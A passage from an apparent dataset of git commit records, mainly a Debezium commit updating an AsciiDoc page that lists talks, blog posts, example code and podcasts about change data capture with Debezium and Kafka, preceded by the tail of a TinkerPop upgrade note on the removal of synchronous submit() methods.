synchronous `submit()` methods on the `RemoteConnection` interface have been removed, which means\nthat `RemoteConnection` implementations will need to implement `submitAsync(Bytecode)` if they have not already done\nso.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89a9668ad7705776ad2448da0113216b553ccfe3","subject":"Update online-resources.asciidoc","message":"Update online-resources.asciidoc","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"documentation\/online-resources.asciidoc","new_file":"documentation\/online-resources.asciidoc","new_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* https:\/\/www.slideshare.net\/kgwap\/kafka-connect-debezium?ref=http:\/\/kasundon.com\/2018\/07\/08\/streaming-mysql-change-sets-to-kafka-aws-kinesis\/[\"Kafka Connect - Debezium; Stream MySQL Events to Kafka\"] by Kasun Don; 2018\n* \"Streaming Database Changes with Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=IOZ2Um6e430[Video recording] from Devoxx 2017; https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[Slides] from RivieraDev 2018)\n* https:\/\/speakerdeck.com\/xenji\/kafka-and-debezium-at-trivago-code-dot-talks-2017-edition\"[\"Kafka and Debezium at trivago\"] by https:\/\/twitter.com\/xenji\/[Mario M\u00fcller] and https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Code.Talks 2017\n* https:\/\/vimeo.com\/168409093[\"Event Sourcing with Debezium and Kafka\"] by Christian Posta; 2016\n\n== Blog Posts & Articles\n\n* https:\/\/medium.com\/incognia-tech\/ensuring-data-consistency-across-services-with-the-transactional-outbox-pattern-90be4d735cb0[\"Ensuring data consistency across services with the Transactional Outbox pattern\"] by Mateus Moury and Rafael Acevedo\n* https:\/\/medium.com\/event-driven-utopia\/a-gentle-introduction-to-event-driven-change-data-capture-683297625f9b[\"A Gentle Introduction to Event-driven Change Data Capture\"] by Dunith Dhanushka\n* https:\/\/maciejszymczyk.medium.com\/change-data-capture-convert-your-database-into-a-stream-with-debezium-356c1a49b459[\"Change Data Capture \u2014 Convert your database into a stream with Debezium\"] by Maciej Szymczyk\n* https:\/\/info.crunchydata.com\/blog\/postgres-change-data-capture-with-debezium[\"Change Data Capture in Postgres With Debezium\"] by Dave Cramer\n* https:\/\/medium.com\/apache-pinot-developer-blog\/change-data-analysis-with-debezium-and-apache-pinot-b4093dc178a7[\"Change Data Analysis with Debezium and Apache Pinot\"] by Kenny Bastani\n* https:\/\/juliuskrah.com\/blog\/2020\/01\/06\/streaming-changes-from-keycloak-using-debezium-cdc\/[\"Streaming Changes from Keycloak using Debezium (CDC)\"] by Julius Krah\n* https:\/\/www.tigeranalytics.com\/blog\/building-nrt-data-pipeline-debezium-kafka-snowflake\/[\"Building a Near-Real Time (NRT) Data Pipeline using Debezium, Kafka, and Snowflake\"] by Arun Kumar Ponnurangam and Karunakar Goud\n* https:\/\/medium.com\/data-rocks\/creating-a-no-code-aws-native-oltp-to-olap-data-pipeline-part-1-50481b57dc30[\"Creating a no-code AWS native OLTP to OLAP data pipeline \u2014 Part 1\"] by Haris Michailidis\n* https:\/\/www.zuehlke.com\/en\/insights\/design-failure-distributed-transactions-microservices[\"Design for Failure \u2014 Distributed Transactions in Microservices\"] by Darren Boo\n* https:\/\/blog.rafaelgss.com.br\/autonomous-microservices[\"Autonomous Microservices - Outbox Pattern\"] by Rafael Gonzaga\n* https:\/\/medium.com\/trendyol-tech\/debezium-with-simple-message-transformation-smt-4f5a80c85358[\"Debezium with Simple Message Transformation (SMT)\"] by Okan Yildirim\n* https:\/\/www.systemcraftsman.com\/2020\/11\/30\/asap-the-storified-demo-of-introduction-to-debezium-and-kafka-on-kubernetes\/[\"ASAP! \u2013 The Storified Demo of Introduction to Debezium and Kafka on Kubernetes\"] by Aykut Bulgu\n* https:\/\/elephanttamer.net\/?p=50[\"Setting up PostgreSQL for Debezium\"] by Micha\u0142 Mackiewicz\n* https:\/\/medium.com\/@midhunsukumaran.mec\/a-year-and-a-half-with-debezium-f4f323b4909d[\"A year and a half with Debezium: CDC With MySQL\"] by Midhun Sukumaran\n* https:\/\/jet-start.sh\/blog\/2020\/10\/06\/enabling-full-text-search[\"Enabling Full-text Search with Change Data Capture in a Legacy Application\"] by Franti\u0161ek Hartman\n* https:\/\/medium.com\/@sumant.rana\/sync-mysql-to-postgresql-using-debezium-and-kafkaconnect-d6612489fd64[\"Sync MySQL to PostgreSQL using Debezium and Kafka Connect\"] by Sumant Rana\n* https:\/\/turkogluc.com\/postgresql-capture-data-change-with-debezium\/[\"Making Sense of Change Data Capture Pipelines for Postgres with Debezium Kafka Connector\"] by Cemal Turkoglu\n* https:\/\/developers.redhat.com\/cheat-sheets\/debezium-openshift-cheat-sheet[\"Debezium on OpenShift Cheat Sheet\"] by Abdellatif Bouchama\n* https:\/\/medium.com\/data-rocks\/managing-kafka-connectors-at-scale-using-kafka-connect-manager-kcm-31d887de033c[\"Managing Kafka Connectors at scale using Kafka Connect Manager\"] by Sandeep Mehta\n* https:\/\/medium.com\/dana-engineering\/streaming-data-changes-in-mysql-into-elasticsearch-using-debezium-kafka-and-confluent-jdbc-sink-8890ad221ccf[\"How to stream data changes from MySQL into Elasticsearch using Debezium\"] by Rizqi Nugroho\n* https:\/\/medium.com\/@changeant\/implementing-the-transactional-outbox-pattern-with-debezium-in-quarkus-f2680306951[\"Implementing the Transactional Outbox pattern with Debezium in Quarkus\"] by Iain Porter\n* https:\/\/www.confluent.io\/blog\/cdc-and-streaming-analytics-using-debezium-kafka\/[\"Analysing Changes with Debezium and Kafka Streams\"] by Mike Fowler\n* https:\/\/medium.com\/@bogdan.dina03\/de-coupling-yourself-507a15fa100d[\"(De)coupling yourself\"] by Dina Bogdan\n* https:\/\/medium.com\/comsystoreply\/stream-your-database-into-kafka-with-debezium-a94b2f649664[\"Stream Your Database into Kafka with Debezium -- An Introduction and Experience Report\"] by David Hettler\n* https:\/\/medium.com\/@limadelrey\/kafka-connect-how-to-create-a-real-time-data-pipeline-using-change-data-capture-cdc-c60e06e5306a[\"Kafka Connect: How to create a real time data pipeline using Change Data Capture (CDC)\"] by Francisco Lima\n* https:\/\/dev.to\/abhirockzz\/tutorial-set-up-a-change-data-capture-architecture-on-azure-using-debezium-postgres-and-kafka-49h6[\"Tutorial: Set up a Change Data Capture architecture on Azure using Debezium, Postgres and Kafka \"] by Abhishek Gupta\n* Kafka Connect \u2013 Offset commit errors by Javier Holguera: https:\/\/www.javierholguera.com\/2020\/06\/02\/kafka-connect-offset-commit-errors-i\/[Part 1], https:\/\/www.javierholguera.com\/2020\/06\/16\/kafka-connect-offset-commit-errors-ii\/[Part 2]\n* https:\/\/medium.com\/@samuel_vdc\/data-liberation-pattern-using-debezium-engine-4fd32b92d826[\"Data liberation pattern using the Debezium engine\"] by Samuel Vandecasteele\n* https:\/\/medium.com\/hepsiburadatech\/postgresql-db-change-data-capture-cdc-using-debezium-f1a933174fd8[\"PostgreSql Db Change Data Capture (CDC) Using Debezium\"] by Caner Tosuner\n* http:\/\/www.mastertheboss.com\/jboss-frameworks\/debezium\/getting-started-with-debezium[\"Getting started with Debezium\"] by Francesco Marchioni\n* https:\/\/dev.to\/oryanmoshe\/debezium-custom-converters-timestampconverter-26hh[\"Debezium Custom Converters - TimestampConverter\"] by Oryan Moshe\n* https:\/\/www.gridgain.com\/resources\/blog\/change-data-capture-between-mysql-and-gridgain-debezium[\"Change Data Capture Between MySQL and GridGain With Debezium\"] by Evgenii Zhuravlev\n* https:\/\/cloud.google.com\/blog\/products\/data-analytics\/how-to-move-data-from-mysql-to-bigquery[\"How do I move data from MySQL to BigQuery?\"], discussing usage of the Debezium embedded engine with Google Cloud Dataflow, by Pablo Estrada and Griselda Cuevas\n* https:\/\/medium.com\/everything-full-stack\/streaming-data-changes-to-a-data-lake-with-debezium-and-delta-lake-pipeline-299821053dc3[\"Streaming data changes to a Data Lake with Debezium and Delta Lake pipeline\"] by Yinon D. Nahamu\n* https:\/\/www.infoq.com\/news\/2020\/01\/cdc-debezium-1-0-final-released\/[\"Change Data Capture Tool Debezium 1.0 Final Released\"] by Jan Stenberg\n* https:\/\/strimzi.io\/2020\/01\/27\/deploying-debezium-with-kafkaconnector-resource.html[\"Deploying Debezium using the new KafkaConnector resource\"] by Tom Bentley\n* https:\/\/www.sderosiaux.com\/articles\/2020\/01\/06\/learnings-from-using-kafka-connect-debezium-postgresql\/[\"Learnings from using Kafka Connect - Debezium - PostgreSQL\"] by St\u00e9phane Derosiaux\n* https:\/\/thedataguy.in\/monitor-debezium-mysql-connector-with-prometheus-and-grafana\/[\"Monitor Debezium MySQL Connector With Prometheus And Grafana\"] by Bhuvanesh\n* http:\/\/www.carbonrider.com\/2019\/11\/16\/change-data-capture-with-apache-kafka-postgresql-kafka-connect-and-debezium\/[\"Change Data Capture with Apache Kafka, PostgreSQL, Kafka Connect and Debezium\"] by Yogesh Jadhav\n* https:\/\/dzone.com\/articles\/implementing-the-outbox-pattern[\"Implementing the Outbox Pattern\"] by Sohan Ganapathy\n* https:\/\/medium.com\/engineering-varo\/event-driven-architecture-and-the-outbox-pattern-569e6fba7216[\"Event-Driven Architecture and the Outbox Pattern\"] by Rod Shokrian\n* https:\/\/medium.com\/convoy-tech\/logs-offsets-near-real-time-elt-with-apache-kafka-snowflake-473da1e4d776[\"Logs & Offsets: (Near) Real Time ELT with Apache Kafka + Snowflake\"] by Adrian Kreuziger\n* https:\/\/info.crunchydata.com\/blog\/postgresql-change-data-capture-with-debezium[\"PostgreSQL Change Data Capture With Debezium\"] by Dave Cramer\n* https:\/\/developers.redhat.com\/blog\/2019\/09\/03\/cdc-pipeline-with-red-hat-amq-streams-and-red-hat-fuse\/[\"CDC pipeline with Red Hat AMQ Streams and Red Hat Fuse\"] by Sadhana Nandakumar\n* https:\/\/medium.com\/@hpgrahsl\/communicating-data-changes-across-service-boundaries-safely-129c4eb5db8[\"Communicating Data Changes Across Service Boundaries\u2026 Safely!\"] by Hans-Peter Grahsl\n* https:\/\/blog.clairvoyantsoft.com\/mysql-cdc-with-apache-kafka-and-debezium-3d45c00762e4[\"MySQL CDC with Apache Kafka and Debezium\"] by Kushal Yellam\n* https:\/\/thoughts-on-java.org\/outbox-pattern-with-cdc-and-debezium\/[\"Implementing the Outbox Pattern with CDC using Debezium\"] by Thorben Janssen\n* https:\/\/blog.zhaw.ch\/splab\/2019\/05\/03\/serverless-plumbing-streaming-mysql-events-to-knative-services\/[\"Serverless Plumbing: Streaming MySQL Events to Knative Services\"] by Mohammed Al-Ameen\n* https:\/\/medium.com\/yotpoengineering\/building-zero-latency-data-lake-using-change-data-capture-f93ef50eb066[\"Building zero-latency data lake using Change Data Capture\"] by Ofir Ventura\n* https:\/\/medium.com\/high-alpha\/data-stream-processing-for-newbies-with-kafka-ksql-and-postgres-c30309cfaaf8[\"Data Stream Processing for Newbies with Kafka, KSQL, and Postgres\"] by Maria Patterson\n* https:\/\/blog.couchbase.com\/kafka-connect-mysql-couchbase-debezium\/[\"Kafka Connect from MySQL to Couchbase with Debezium\"] by Matthew Groves\n* https:\/\/www.linkedin.com\/pulse\/change-data-capture-postgresql-via-debezium-part-1-paolo-scarpino\/[\"Change Data Capture on PostgreSQL via Debezium\"] by Paolo Scarpino\n* https:\/\/medium.com\/jw-player-engineering\/southpaw-176aea5f4583[\"Southpaw - Streaming Left Joins with Change Data Capture\"] by Morrigan Jones\n* https:\/\/medium.com\/@hpgrahsl\/connecting-apache-kafka-to-azure-cosmosdb-part-ii-b96cf0f5cdfa[\"Connecting Apache Kafka to Azure CosmosDB\u200a\u2014\u200aPart II\"] by Hans-Peter Grahsl\n* https:\/\/vladmihalcea.com\/how-to-extract-change-data-events-from-mysql-to-kafka-using-debezium\/[\"How to extract change data events from MySQL to Kafka using Debezium\"] by Vlad Mihalcea\n* https:\/\/rmoff.net\/2019\/10\/16\/using-kafka-connect-and-debezium-with-confluent-cloud\/[\"Using Kafka Connect and Debezium with Confluent Cloud\"]\n* https:\/\/rmoff.net\/2019\/11\/20\/streaming-data-from-sql-server-to-kafka-to-snowflake-with-kafka-connect\/[\"Streaming data from SQL Server to Kafka to Snowflake \u2744\ufe0f with Kafka Connect and Debezium\"]\n* https:\/\/rmoff.net\/2018\/03\/24\/streaming-data-from-mysql-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MySQL into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/rmoff.net\/2018\/03\/27\/streaming-data-from-mongodb-into-kafka-with-kafka-connect-and-debezium\/[\"Streaming Data from MongoDB into Kafka with Kafka Connect and Debezium\"] by Robin Moffatt\n* https:\/\/medium.com\/@tilakpatidar\/streaming-data-from-postgresql-to-kafka-using-debezium-a14a2644906d[\"Streaming data from PostgreSQL to Kafka using Debezium\"] by Tilak Patidar\n* https:\/\/medium.com\/blablacar-tech\/streaming-data-out-of-the-monolith-building-a-highly-reliable-cdc-stack-d71599131acb[\"Streaming Data out of the Monolith: Building a Highly Reliable CDC Stack\"] by Yuancheng Peng\n* https:\/\/iamninad.com\/how-debezium-kafka-stream-can-help-you-write-cdc\/[\"How Debezium & Kafka Streams Can Help You Write CDC Solution\"] by Neenad Ingole\n* https:\/\/jakubbujny.com\/2018\/09\/20\/replicate-cloud-aws-rds-mysql-to-on-premise-postgresql-in-docker-future-is-today-debezium-and-kafka-on-aws-eks\/[Replicate cloud AWS RDS MySQL to on-premise PostgreSQL in Docker \u2013 future is today! Debezium and Kafka on AWS EKS] by Jakub Bujny\n* https:\/\/medium.com\/@mauridb\/sql-server-change-stream-b204c0892641[\"SQL Server Change Stream - Responding to data changes in real time using modern technologies\"]\n* https:\/\/medium.com\/@hpgrahsl\/optimizing-read-access-to-sharded-mongodb-collections-utilizing-apache-kafka-connect-cdcd8ec6228[\"Optimizing Read Access to Sharded MongoDB Collections utilizing Apache Kafka Connect\"] by Hans-Peter Grahsl\n\n== Example Code\n\n* https:\/\/github.com\/debezium\/debezium-examples\/[Debezium's official examples]\n* https:\/\/ibm-cloud-architecture.github.io\/refarch-eda\/use-cases\/db2-debezium\/[DB2 Change Data Capture with Debezium]\n* https:\/\/github.com\/yorek\/debezium-sql-change-stream[\"SQL Server Change Stream sample using Debezium\"] by Davide Mauri\n* https:\/\/github.com\/foogaro\/change-data-capture[\"CDC project based on Debezium, Kafka, MS SQL Server, Infinispan and Teiid, entirely based on containers\"] by Luigi Fugaro\n* https:\/\/github.com\/fvaleri\/cdc[\"CDC with Camel and Debezium: code-driven vs configuration-driven pipelines\"] by Federico Valeri\n* https:\/\/github.com\/morsapaes\/flink-sql-CDC[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/github.com\/suadev\/microservices-change-data-capture-with-debezium[\"Microservices Change Data Capture With Debezium\"] by Suat K\u00f6se\n\n== Interviews and Podcasts\n\n* https:\/\/www.dataengineeringpodcast.com\/debezium-change-data-capture-episode-114\/[Change Data Capture For All Of Your Databases With Debezium -- episode #114 of the Data Engineering Podcast by Tobias Macey, together with Randall Hauch]\n* https:\/\/www.buzzsprout.com\/186154\/1770184[MySQL, Cassandra, BigQuery, and Streaming Analytics with Joy Gao]\n* http:\/\/airhacks.fm\/#episode_57[CDC, Debezium, streaming and Apache Kafka -- episode #57 of Adam Bien's airhacks.fm podcast]\n* https:\/\/www.buzzsprout.com\/186154\/1365043-change-data-capture-with-debezium-ft-gunnar-morling[Change Data Capture with Debezium ft. Gunnar Morling]\n* https:\/\/www.youtube.com\/watch?v=H-yGdKy48VE[Interview with Gunnar Morling] for thoughts-on-java.org\n\n== Other\n\n* https:\/\/www.thoughtworks.com\/radar\/platforms\/debezium[Debezium entry in the ThoughtWorks Technology Radar]\n* https:\/\/learn.openshift.com\/middleware\/debezium-getting-started\/[Getting Started with Debezium on OpenShift]; interactive Debezium learning scenario allowing you to try out Debezium on OpenShift within minutes\n\n== Non-English Resources\n\n* \ud83c\udde9\ud83c\uddea https:\/\/blogs.zeiss.com\/digital-innovation\/de\/datenbankaenderungen-teil-1\/[Datenbank\u00e4nderungen erkennen und streamen mit Debezium und Apache Kafka (Teil 1) \u2013 Die Theorie] by (blog post, German)\n* \ud83c\uddf5\ud83c\uddf1 https:\/\/wiadrodanych.pl\/big-data\/change-data-capture-mysql-debezium\/[Change Data Capture \u2013 Zmie\u0144 Baz\u0119 W Strumie\u0144 (Debezium)] by Maciej Szymczyk (blog post, Polish)\n* \ud83c\uddf7\ud83c\uddfa https:\/\/habr.com\/ru\/company\/flant\/blog\/523510\/[\u0417\u043d\u0430\u043a\u043e\u043c\u0441\u0442\u0432\u043e \u0441 Debezium \u2014 CDC \u0434\u043b\u044f Apache Kafka] (blog post, Russian)\n* \ud83c\udde8\ud83c\uddf3 https:\/\/mp.weixin.qq.com\/s\/Mfn-fFegb5wzI8BIHhNGvQ[\"Flink SQL CDC \u4e0a\u7ebf\uff01\u6211\u4eec\u603b\u7ed3\u4e86 13 \u6761\u751f\u4ea7\u5b9e\u8df5\u7ecf\u9a8c\"] by Zeng Qingdong (blog post, Mandarin)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@viavarejo.productdevelopment\/uma-estrat%C3%A9gia-de-cdc-com-debezium-e27aa945d7b0[\"Uma estrat\u00e9gia de CDC com Debezium\"] by Jo\u00e3o Gabriel Mello, Brunno Lira and Marcelo Costa (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.infoq.com\/br\/presentations\/postgresql-ao-datalake-utilizando-kafkadebezium\/[Do PostgreSQL ao Data Lake utilizando Kafka-Debezium] by Paulo Singaretti, PGConf S\u00e3o Paulo 2019 (conference session recording, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/www.youtube.com\/watch?v=jtVD-HIJG9M&feature=youtu.be[Quarkus #25: Monitoramento de qualquer opera\u00e7\u00e3o em uma tabela do banco de dados com Debezium] by Vinicius Ferraz (sceen cast, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/elo7.dev\/cdc-parte-1\/[\"Introdu\u00e7\u00e3o ao Change Data Capture (CDC)\"] by Renato Sardinha (blog post, Portuguese)\n* \ud83c\udde7\ud83c\uddf7 https:\/\/medium.com\/@singaretti\/streaming-de-dados-do-postgresql-utilizando-kafka-debezium-v2-d49f46d70b37[\"Streaming de dados (do PostgreSQL) utilizando Kafka|Debezium (v2)\"] by Paulo Singaretti (blog post, Portuguese)\n* \ud83c\uddeb\ud83c\uddf7 https:\/\/www.synaltic.fr\/blog\/conference-poss-11-12-2019\/[Conf\u00e9rence POSS 2019 : Streaming Processing avec Debezium] by Yabir Canario De la Mota & Charly Clairmont (blog post, French)\n* \ud83c\udde9\ud83c\uddea https:\/\/www.heise.de\/developer\/artikel\/Im-Gespraech-Gunnar-Morling-ueber-Debezium-und-CDC-4513865.html[Im Gespr\u00e4ch: Gunnar Morling \u00fcber Debezium und CDC]; interview with Thorben Janssen for heise.de (podcast, German)\n* \ud83c\uddee\ud83c\udde9 https:\/\/medium.com\/easyread\/ingest-data-dari-mysql-database-ke-bigquery-dengan-apache-kafka-dan-debezium-f519e197f39c[\"Ingesting Data dari MySQL Database ke BigQuery dengan Apache Kafka dan Debezium\"] by Ilyas Ahsan (blog post, Indonesian)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/19\/debezium-camel-integration\/[Debezium\u3068Apache Camel\u306e\u30a4\u30f3\u30c6\u30b0\u30ec\u30fc\u30b7\u30e7\u30f3\u30b7\u30ca\u30ea\u30aa] (Japanese translation of the blog post link:\/blog\/2020\/02\/19\/debezium-camel-integration\/[Integration Scenarios with Debezium and Apache Camel] by Jiri Pechanec)\n* \ud83c\uddef\ud83c\uddf5 https:\/\/rheb.hatenablog.com\/entry\/2020\/02\/10\/event-sourcing-vs-cdc\/[\u30de\u30a4\u30af\u30ed\u30b5\u30fc\u30d3\u30b9\u306e\u305f\u3081\u306e\u5206\u6563\u30c7\u30fc\u30bf \u301c \u30a4\u30d9\u30f3\u30c8\u30bd\u30fc\u30b7\u30f3\u30b0 vs \u30c1\u30a7\u30f3\u30b8\u30c7\u30fc\u30bf\u30ad\u30e3\u30d7\u30c1\u30e3] (Japanese translation of the blog post link:\/blog\/2020\/02\/10\/event-sourcing-vs-cdc\/[Distributed Data for Microservices \u2014 Event Sourcing vs. Change Data Capture] by Eric Murphy)\n","old_contents":"---\nlayout: page-menu\ntitle: Resources on the Web\npermalink: \/documentation\/online-resources\/\n---\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\nA compilation of blog posts, slide sets, recordings and other online resources around Debezium.\nMost of the resources are in English; you can find a collection of link:#non_english_resources[resources in other languages] like Portuguese or French towards the end of this page.\n\nYou've written or spoken about Debezium and would like to have your post or talk listed here?\nThat's great, let us know by sharing the link in our https:\/\/groups.google.com\/forum\/#!forum\/debezium[forum].\nOr better yet, just add the link to the https:\/\/github.com\/debezium\/debezium.github.io\/blob\/develop\/docs\/online-resources.asciidoc[source of this page] yourself and send a pull request against the https:\/\/github.com\/debezium\/debezium.github.io[debezium.github.io] repo.\nThanks!\n\n== Presentations, Session Recordings and Videos\n\n* link:++https:\/\/static.sched.com\/hosted_files\/ossna2020\/c6\/Managing Data Consistency with Debezium.pdf++[\"Managing Data Consistency Among Microservices with Debezium\"] by Justin Chao\n* https:\/\/noti.st\/morsapaes\/liQzgs\/change-data-capture-with-flink-sql-and-debezium[\"Change Data Capture with Flink SQL and Debezium\"] by Marta Paes\n* https:\/\/www.youtube.com\/watch?v=DJTtGaPsSYY[\"Quarkus Insights #10: CDC, Debezium and the outbox pattern\"]; a live-streamed session with the Quarkus team on Debezium and the outbox pattern, including a demo\n* https:\/\/www.slideshare.net\/nfrankel\/london-inmemory-computing-meetup-a-changedatacapture-usecase-designing-an-evergreen-cache[\"A Change-Data-Capture use-case: designing an evergreen cache\"] by Nicolas Fr\u00e4nkel\n* https:\/\/www.youtube.com\/watch?v=6nU9i022yeY[\"Microservices & Data: Implementing the Outbox Pattern with Debezium\"] by Thorben Janssen\n* \"Practical Change Data Streaming Use Cases With Apache Kafka and Debezium\" (https:\/\/www.infoq.com\/presentations\/data-streaming-kafka-debezium\/[recording], https:\/\/speakerdeck.com\/gunnarmorling\/practical-change-data-streaming-use-cases-with-apache-kafka-and-debezium-qcon-san-francisco-2019[slides]) by Gunnar Morling; QCon San Francisco 2019; JokerConf St. Petersburg 2019\n* https:\/\/speakerdeck.com\/jbfletch\/using-kafka-to-discover-events-hidden-in-your-database[\"Using Kafka to Discover Events Hidden in your Database\"] by Anna McDonald; Kafka Summit San Francisco 2019\n* https:\/\/databricks.com\/session_eu19\/modern-etl-pipelines-with-change-data-capture[\"Modern ETL Pipelines with Change Data Capture\"] by Thiago Rigo and David Mariassy; Spark and AI Summit Europe 2019\n* https:\/\/www.infoq.com\/news\/2019\/04\/change-data-capture-debezium\/[\"Creating Events from Databases Using Change Data Capture: Gunnar Morling at MicroXchg Berlin\"] by Jan Stenberg; a session report from MicroXchg\n* https:\/\/developers.redhat.com\/videos\/youtube\/QYbXDp4Vu-8\/[\"Change Data Streaming Patterns for Microservices With Debezium\"] by Gunnar Morling; 30 min webinar with live demo, February 2019\n* https:\/\/www.slideshare.net\/MikeFowler28\/migrating-with-debezium[\"Migrating with Debezium\"] by Mike Fowler; London PostgreSQL Meetup, January 2019\n* \"The Why's and How's of Database Streaming\" by Joy Gao (https:\/\/www.infoq.com\/presentations\/wepay-database-streaming[recording], https:\/\/qconsf.com\/system\/files\/presentation-slides\/whys_and_hows_of_database_streaming_final.pdf[slides]), QCon San Francisco, 2018\n* \"Change Data Streaming Patterns for Microservices With Debezium\" by Gunnar Morling (https:\/\/www.youtube.com\/watch?v=NawsloOoFo0[video recording], https:\/\/speakerdeck.com\/gunnarmorling\/data-streaming-for-microservices-using-debezium[slides]), Voxxed Microservices Paris 2018; https:\/\/www.confluent.io\/kafka-summit-sf18\/change-data-streaming-patterns-for-microservices-with-debezium[recording and slides] from Kafka Summit San Francisco 2018\n* https:\/\/speakerdeck.com\/rk3rn3r\/i-need-my-data-and-a-little-bit-of-your-data-dot-integrating-services-with-apache-kafka-confluent-streaming-event-munich[\"I need my data and a little bit of your data.\" - Integrating services with Apache Kafka] by https:\/\/twitter.com\/rk3rn3r\/[Ren\u00e9 Kerner]; Confluent Streaming Event Munich 2018\n* https:\/\/aiven.io\/assets\/img\/blog\/zalando-kafka-cdc-presentation.pdf[\"PG Change Data Capture with Debezium\"] by Hannu Valtonen; Kafka Meetup Helsinki 2018\n* https:\/\/de.slideshare.net\/FrankLyaruu\/embracing-database-diversity-with-kafka-and-debezium[\"Embracing Database Diversity with Kafka and Debezium\"] by Frank Lyaruu; VoxxedDays Vienna 2018\n* https:\/\/speakerdeck.com\/japoneizo\/syncing-data-between-microservices-using-debezium-and-apache-kafka[\"Syncing data between microservices using Debezium and Apache Kafka\"] by Eizo Nishime; The Developer's Conference S\u00e3o Paulo 2018\n* 